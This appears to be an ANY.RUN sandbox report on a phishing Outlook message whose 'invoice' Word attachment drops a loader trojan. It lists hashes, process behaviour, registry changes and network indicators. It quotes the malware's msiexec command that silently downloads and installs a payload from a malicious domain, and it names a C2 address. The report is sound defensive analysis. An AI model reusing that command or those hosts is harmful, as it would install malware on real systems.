analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

0a9d_0f35_5aa07f51_42d0_4d7e_a6db_ed4bc7a7f17f.eml (72.3 KB).msg

Full analysis: https://app.any.run/tasks/4fbc85f0-b6dd-4014-935a-d02a8e958b81
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 08, 2018, 11:07:51
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
loader
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

5DCBF8AFEF9F2A0929CD73EB30869BB4

SHA1:

F73EDD7C20FC75CA565FBC9635E6E49E9B59B2AC

SHA256:

444E14F4C79FA4A483EE50BC58C5F85FF7B850265E86850A4DEB141EDC43A615

SSDEEP:

1536:9GX1vQYwGCIbRAXY8S5GxvSt3y83D2hY2Mgmx32p:9GX1vxCpKt3R4Y2Dmxg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Loads the Task Scheduler COM API

      • WINWORD.EXE (PID: 2212)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3164)
    • Application was dropped or rewritten from another process

      • WMIsvc.exe (PID: 3028)
      • exit.exe (PID: 1972)
      • btc.exe (PID: 328)
      • exit.exe (PID: 3632)
      • winserv.exe (PID: 3880)
    • Changes the autorun value in the registry

      • reg.exe (PID: 3768)
    • Loads dropped or rewritten executable

      • cmd.exe (PID: 2748)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 2212)
      • OUTLOOK.EXE (PID: 2044)
    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 2044)
    • Application launched itself

      • WINWORD.EXE (PID: 2212)
    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 2044)
      • winserv.exe (PID: 3880)
    • Executable content was dropped or overwritten

      • WMIsvc.exe (PID: 3028)
      • msiexec.exe (PID: 3164)
      • cmd.exe (PID: 2748)
      • btc.exe (PID: 328)
    • Starts CMD.EXE for commands execution

      • exit.exe (PID: 1972)
      • exit.exe (PID: 3632)
    • Creates files in the program directory

      • btc.exe (PID: 328)
    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 892)
    • Reads the machine GUID from the registry

      • winserv.exe (PID: 3880)
    • Reads Windows Product ID

      • winserv.exe (PID: 3880)
    • Connects to unusual port

      • winserv.exe (PID: 3880)
    • Reads Environment values

      • winserv.exe (PID: 3880)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 892)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1260)
      • WINWORD.EXE (PID: 2212)
      • OUTLOOK.EXE (PID: 2044)
      • WINWORD.EXE (PID: 3108)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2212)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3164)
    • Creates a software uninstall entry

      • msiexec.exe (PID: 3164)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (46.5)
.oft | Outlook Form Template (27.2)
.doc | Microsoft Word document (20.9)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
199
Monitored processes
163
Malicious processes
4
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start outlook.exe winword.exe no specs winword.exe no specs winword.exe no specs msiexec.exe no specs msiexec.exe wmisvc.exe exit.exe no specs cmd.exe ping.exe no specs ping.exe no specs btc.exe exit.exe no specs cmd.exe no specs reg.exe winserv.exe taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2044"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\0a9d_0f35_5aa07f51_42d0_4d7e_a6db_ed4bc7a7f17f.eml (72.3 KB).msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
1260"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEOUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Version:
14.0.6024.1000
2212"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\P1P7MX1N\invoice-07 11 2018.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEOUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3108"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1824C:\Windows\System32\msiexec.exe VI=ssa EXE=DLL /q /norestart /i http://officesupportbox.com/WMIsvcC:\Windows\System32\msiexec.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3164C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3028"C:\Users\admin\AppData\Local\Temp\Data1\WMIsvc.exe"C:\Users\admin\AppData\Local\Temp\Data1\WMIsvc.exe
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1972"C:\Users\admin\AppData\Local\Temp\exit.exe" C:\Users\admin\AppData\Local\Temp\exit.exeWMIsvc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Wiskas
Exit code:
0
Version:
1.0.0.0
2748cmd /c i.cmdC:\Windows\system32\cmd.exe
exit.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1744ping yandex.com -n 3 -w 6000C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
5 270
Read events
4 329
Write events
902
Delete events
39

Modification events

(PID) Process:(2044) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2044) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2044) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems
Operation:writeName::'m
Value:
3A276D00FC070000010000000000000000000000
(PID) Process:(2044) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook
Operation:writeName:MTTT
Value:
FC070000741FCF565377D40100000000
(PID) Process:(2044) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\SQM
Operation:writeName:SQMSessionNumber
Value:
0
(PID) Process:(2044) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\SQM
Operation:writeName:SQMSessionDate
Value:
219768480
(PID) Process:(2044) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\0a0d020000000000c000000000000046
Operation:writeName:00030429
Value:
03000000
(PID) Process:(2044) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\9375CFF0413111d3B88A00104B2A6676
Operation:writeName:{ED475418-B0D6-11D2-8C3B-00104B2A6676}
Value:
(PID) Process:(2044) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\9375CFF0413111d3B88A00104B2A6676
Operation:writeName:LastChangeVer
Value:
1200000000000000
(PID) Process:(2044) OUTLOOK.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109A10090400000000000F01FEC\Usage
Operation:writeName:OutlookMAPI2Intl_1033
Value:
1298661397
Executable files
8
Suspicious files
8
Text files
38
Unknown types
6

Dropped files

PID
Process
Filename
Type
2044OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVR972A.tmp.cvr
MD5:
SHA256:
2044OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DFC92BE262ED791FA8.TMP
MD5:
SHA256:
2044OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\P1P7MX1N\invoice-07 11 2018 (2).doc\:Zone.Identifier:$DATA
MD5:
SHA256:
2044OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DF7510FBBDC2492F0E.TMP
MD5:
SHA256:
2044OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DF3C71F94C79FB38EF.TMP
MD5:
SHA256:
2044OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\OICE_2582EFA4-D472-4596-B9F2-26866DDAF61B.0\42C5798D.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
2212WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR11F8.tmp.cvr
MD5:
SHA256:
1260WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_2582EFA4-D472-4596-B9F2-26866DDAF61B.0\~DF8132BD1FDD750647.TMP
MD5:
SHA256:
2212WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_B2A9910D-7835-4467-A6B8-723BE1FF187A.0\E839FCC9.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
3108WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_B2A9910D-7835-4467-A6B8-723BE1FF187A.0\~DF6A75B1AA00523633.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2044
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
3164
msiexec.exe
GET
200
185.244.130.88:80
http://officesupportbox.com/WMIsvc
unknown
executable
3.57 Mb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3880
winserv.exe
89.144.25.16:5655
GHOSTnet GmbH
DE
suspicious
2044
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted
3164
msiexec.exe
185.244.130.88:80
officesupportbox.com
malicious

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
officesupportbox.com
  • 185.244.130.88
malicious
yandex.com
  • 213.180.204.62
whitelisted

Threats

PID
Process
Class
Message
3164
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
3164
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
1 ETPRO signatures available at the full report
Process
Message
winserv.exe
Error WTSQueryUserToken #1314
winserv.exe
08-11-2018_11:09:22:158#T:Error #20 @2
winserv.exe
08-11-2018_11:09:55:674#T:Msg Size: 203
winserv.exe
08-11-2018_11:09:55:674#T:Msg code: 3
winserv.exe
08-11-2018_11:09:55:674#T:MSG_KEEP_ALIVE
winserv.exe
MSG_KEEP_ALIVE